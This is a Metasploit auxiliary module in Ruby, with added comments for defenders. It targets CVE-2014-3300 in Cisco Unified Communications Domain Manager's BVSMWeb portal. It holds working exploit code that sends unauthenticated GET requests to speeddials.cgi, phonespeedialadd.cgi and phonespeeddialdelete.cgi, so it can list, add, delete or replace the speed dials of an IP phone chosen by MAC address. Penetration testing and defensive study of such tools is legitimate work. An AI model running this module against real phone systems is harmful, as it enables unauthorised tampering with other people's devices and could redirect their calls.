rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rexml/document'
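# Auxiliary module for CVE-2014-3300 (BID 68331): lists, adds, deletes or
# replaces speed dial entries of an IP phone through the BVSMWeb XML services
# of Cisco Unified Communications Domain Manager.
#
# Notes for defenders, drawn from this file only:
# * Every action is a plain GET request to one of `speeddials.cgi`,
#   `phonespeedialadd.cgi` or `phonespeeddialdelete.cgi` below TARGETURI
#   (default `/bvsmweb`), carrying a `device=SEP<MAC>` query parameter. The
#   module passes no credentials of its own in these requests.
# * The module metadata declares IOC_IN_LOGS, so those requests are expected
#   to be visible in the portal's request logs.
# * The description scopes the flaw to CDM releases before version 10.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata, the four actions and the datastore options.
  #
  # @param info [Hash] metadata overrides merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Viproy CUCDM IP Phone XML Services - Speed Dial Attack Tool',
        'Description' => %q{
          The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager
          (CDM), before version 10, doesn't implement access control properly, which allows remote
          attackers to modify user information. This module exploits the vulnerability to make
          unauthorized speed dial entity manipulations.
        },
        'Author' => 'fozavci',
        'References' => [
          ['CVE', '2014-3300'],
          ['BID', '68331']
        ],
        'License' => MSF_LICENSE,
        'Actions' => [
          [ 'List', { 'Description' => 'Getting the speeddials for the MAC address' } ],
          [ 'Modify', { 'Description' => 'Modifying a speeddial for the MAC address' } ],
          [ 'Add', { 'Description' => 'Adding a speeddial for the MAC address' } ],
          [ 'Delete', { 'Description' => 'Deleting a speeddial for the MAC address' } ]
        ],
        'DefaultAction' => 'List',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),
        OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']),
        OptString.new('NAME', [ false, 'Name for Speed Dial', 'viproy']),
        OptString.new('POSITION', [ false, 'Position for Speed Dial', '1']),
        OptString.new('TELNO', [ false, 'Phone number for Speed Dial', '007']),
      ]
    )
  end

  # Dispatches to the handler of the selected action. An action name outside
  # the four registered ones matches no branch and does nothing.
  def run
    case action.name.upcase
    when 'MODIFY'
      modify
    when 'DELETE'
      delete
    when 'ADD'
      add
    when 'LIST'
      list
    end
  end

  # Sends one GET request to a CGI endpoint below TARGETURI and classifies the
  # reply by whether it is a 200 whose body mentions "Speed Dial"/"Speed dial".
  #
  # @param uri [String] endpoint name, joined onto TARGETURI
  # @param vars_get [Hash] query-string parameters
  # @return [Array] a check code (Vulnerable or Safe) followed by the response,
  #   which is whatever send_request_cgi returned and may be nil
  def send_rcv(uri, vars_get)
    uri = normalize_uri(target_uri.to_s, uri.to_s)
    res = send_request_cgi(
      {
        'uri' => uri,
        'method' => 'GET',
        'vars_get' => vars_get
      }
    )

    # The original class [D|d] also accepted a literal "|"; only the two
    # letter cases are meant. A nil body becomes "" and simply fails to match.
    if res && res.code == 200 && res.body.to_s.match?(/Speed [Dd]ial/)
      return [Exploit::CheckCode::Vulnerable, res]
    end

    # NOTE(review): this branch is also taken when no response arrived at all,
    # so the message does not distinguish an unreachable host from a safe one.
    print_error('Target appears not vulnerable!')
    [Exploit::CheckCode::Safe, res]
  end

  # Prints the speed dial entries found in a directory response.
  #
  # The body is server-controlled, so a reply that is not well-formed XML or
  # has no root element is reported instead of raising out of the module.
  #
  # @param res [#body] response whose body holds the XML directory listing
  # @return [void]
  def parse(res)
    begin
      doc = REXML::Document.new(res.body)
    rescue REXML::ParseException
      print_error('Speed Dial response is not well-formed XML')
      return
    end

    # An empty document has no root; treat it as a listing without entries.
    entries = doc.root ? doc.root.get_elements('DirectoryEntry') : []

    # Names and telephones are gathered into two parallel lists and paired by
    # index, as the original did.
    names = entries.flat_map { |entry| entry.get_elements('Name').map { |el| el[0].to_s } }
    phones = entries.flat_map { |entry| entry.get_elements('Telephone').map { |el| el[0].to_s } }

    if names.empty?
      print_status('No Speed Dial detected')
      return
    end

    names.zip(phones) do |label, phone|
      # The code splits each Name text on ":" and reads the first two fields
      # as position and display name.
      position, name = label.split(':')
      print_good("Position: #{position}, Name: #{name}, Telephone: #{phone}")
    end
  end

  # Requests the speed dial listing for the configured MAC and prints it.
  def list
    mac = datastore['MAC']

    print_status('Getting Speed Dials of the IP phone')
    status, res = send_rcv('speeddials.cgi', { 'device' => "SEP#{mac}" })
    parse(res) unless status == Exploit::CheckCode::Safe
  end

  # Requests creation of a speed dial entry at POSITION with NAME and TELNO.
  #
  # @return [Boolean] true when the reply confirms the entry was added
  def add
    mac = datastore['MAC']
    position = datastore['POSITION']

    print_status('Adding Speed Dial to the IP phone')
    vars_get = {
      'name' => datastore['NAME'].to_s,
      'telno' => datastore['TELNO'].to_s,
      'device' => "SEP#{mac}",
      'entry' => position.to_s,
      'mac' => mac.to_s
    }
    status, res = send_rcv('phonespeedialadd.cgi', vars_get)
    body = res ? res.body.to_s : ''

    if status == Exploit::CheckCode::Vulnerable && body.match?(/Added/)
      print_good("Speed Dial #{position} is added successfully")
      true
    elsif body.match?(/exist/)
      print_error('Speed Dial is exist, change the position or choose modify!')
      false
    else
      print_error("Speed Dial couldn't add!")
      false
    end
  end

  # Requests removal of the speed dial entry at POSITION.
  #
  # @return [Boolean] true when the reply confirms the entry was deleted
  def delete
    mac = datastore['MAC']
    position = datastore['POSITION']

    print_status('Deleting Speed Dial of the IP phone')
    vars_get = {
      'entry' => position.to_s,
      'device' => "SEP#{mac}"
    }
    status, res = send_rcv('phonespeeddialdelete.cgi', vars_get)

    if status == Exploit::CheckCode::Vulnerable && res && res.body.to_s.match?(/Deleted/)
      print_good("Speed Dial #{position} is deleted successfully")
      true
    else
      print_error('Speed Dial is not found!')
      false
    end
  end

  # Replaces the entry at POSITION: deletes it and, only when the deletion was
  # confirmed, adds the new entry. This issues the same requests and messages
  # as the former inline copy of the delete and add logic.
  #
  # @return [Boolean, nil] result of the add step, or nil when deletion failed
  def modify
    add if delete
  end
end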